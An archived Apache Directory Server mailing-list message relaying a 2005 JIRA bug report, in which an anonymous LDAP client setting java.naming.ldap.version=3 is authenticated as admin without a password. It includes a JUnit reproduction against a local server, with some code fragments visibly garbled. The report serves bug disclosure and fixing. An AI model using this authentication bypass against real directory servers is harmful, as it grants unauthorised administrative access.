directory-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Endi S. Dewata (JIRA)" <>
Subject [jira] Created: (DIREVE-239) Anonymous user may gain access as admin user
Date Wed, 31 Aug 2005 00:45:04 GMT
Anonymous user may gain access as admin user

         Key: DIREVE-239
     Project: Directory Server
        Type: Bug
    Versions: 0.9.3    
 Reporter: Endi S. Dewata
 Assigned to: Alex Karasulu 

Anonymous user may gain access as admin user by specifying java.naming.ldap.version=3 in the
JNDI client.

To show the problem, add a print statement in the at line 369:

                // perform the authentication
                LdapPrincipal authorizationId = authenticator.authenticate( ctx );
                System.out.println("Authorization ID: "+authorizationId);

Start the server, then run the following program:

import junit.framework.TestCase;
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import java.util.Hashtable;

public class Test extends TestCase {

    public void testAnonymousBindWithLDAPVersion3() throws Exception {

        String suffix = "dc=apache,dc=org";

        Hashtable env = new Hashtable();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, "ldap://localhost:10389/");
        // env.put("java.naming.ldap.version", "3");

        DirContext ctx = new InitialDirContext(env);

        SearchControls sc = new SearchControls();

        NamingEnumeration ne =, "(objectClass=*)", sc);

        System.out.println("Search results:");

        int counter = 0;
        while (ne.hasMore()) {
            SearchResult sr = (SearchResult);
            String rdn = sr.getName();
            System.out.println(" - "+("".equals(rdn) ? suffix : rdn+","+suffix));

        System.out.println("Found "+counter+" entries.");


Without specifying java.naming.ldap.version=3, the user will remain anonymous (empty Authentication
ID). However, with java.naming.ldap.version=3, the anonymous user gets authenticated as the
admin user without even specifying any password.

This message is automatically generated by JIRA.
If you think it was sent incorrectly contact one of the administrators:
For more information on JIRA, see:

View raw message